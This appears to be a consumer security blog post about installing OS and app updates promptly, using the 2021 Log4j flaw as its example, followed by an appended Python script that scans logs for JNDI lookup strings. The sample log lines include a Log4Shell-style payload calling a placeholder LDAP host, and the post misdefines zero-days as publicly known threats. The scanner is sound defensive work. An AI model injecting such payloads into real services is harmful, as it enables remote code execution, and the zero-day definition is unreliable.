These updates aren’t necessarily to make your use of the application better. Most of the updates are to protect you from newly discovered vulnerabilities.
This one is simple: keep your operating system and your applications up to date. If the OS has a security update, install it immediately. Application updates too! The small updates are often there to repair security vulnerabilities. And, except for major OS updates, security fixes are usually only provided for the most current release of a product.
Security-related patches may repair the OS or an app to guard it against zero-day vulnerabilities. These are publicly identified, known threats. Once published, not only do the companies with the flaw know about the vulnerability and work to fix it, but it is also known to every attacker. Patches are often applied the same day the vulnerability is publicly identified. You need to update your smartphone or computer ASAP.
There is no good reason not to be vigilant about implementing this tip.
An example that proves the point: the Log4j discovery.
As people were taking vacation time before the end of 2021, between Thanksgiving and Christmas, one of the biggest zero-day exploits was discovered. The vulnerability was published on a Thursday night, December 9th. Corporations and those who watch for vulnerability postings were alerted as they came to work on Friday, December 10th.
By Saturday, corporations around the globe were seeing attackers scan their networks to find out whether Log4j was present so they could exploit it. The thing about this vulnerability was that the package, a Java library, is one of the most popular used by programmers to handle logging. Since logging is handled well by Log4j, programmers don’t reinvent the wheel; they use what works and focus on the objective of their product.
Okay, you don’t write programs, so why should you care? You care because the vulnerability exposed a backdoor onto devices without needing a username and password. Without the need for authentication, attackers had remote code execution capability. This means they could create any piece of code they wanted (e.g., to scan your device for passwords, personal information, etc.) and, through the program’s logging function, execute that code remotely to fetch the information. And, unlike infamous vulnerabilities like Heartbleed or Trojan Source, the “behind the scenes” coordination for public notice wasn’t done, so attackers knew of the issue before the industry had time to react.
It is extremely likely your smartphone and computers ran not just one but multiple applications using this logging library. So, when the developers of those applications released a patch, it was essential for you to install it as soon as it was made available.
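To show the defender's side of the story above, here is an added example (not part of the original post) of the kind of check teams ran over their logs once the flaw was public: it flags the "${...}" lookup syntax that a vulnerable Log4j would have evaluated inside logged input such as a User-Agent. The sample log lines and the placeholder host are constructed for this example.

```python
import re
from typing import List, Tuple

# Constructed sample access-log lines (not from the original post). A vulnerable Log4j
# version would evaluate "${...}" lookups found in logged input such as the User-Agent.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /api/items HTTP/1.1" 200 "curl/7.68.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://placeholder.invalid/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:PLACEHOLDER}}"',
    '10.0.0.3 - - "GET /health HTTP/1.1" 200 "Mozilla/5.0"',
]

# Direct JNDI lookup, matched case-insensitively.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any lookup syntax at all. Legitimate request fields should never contain it, and
# Log4j resolves nested lookups, so a "${" inside "${" deserves review even without "jndi".
LOOKUP_PATTERN = re.compile(r"\$\{[^}]*\}")


def classify_line(line: str) -> str:
    """Return 'high', 'medium' or 'clean' for one log line."""
    if JNDI_PATTERN.search(line):
        return "high"
    if LOOKUP_PATTERN.search(line):
        return "medium"
    return "clean"


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, severity, line) for every line that is not clean."""
    findings = []
    for number, line in enumerate(lines, start=1):
        severity = classify_line(line)
        if severity != "clean":
            findings.append((number, severity, line))
    return findings


if __name__ == "__main__":
    for number, severity, line in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {severity.upper()} {line}")
```

A hit in the log means the input reached a logging call; whether it did any harm depends on which Log4j version the application shipped, which is exactly why the patch had to be installed as soon as it was available.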
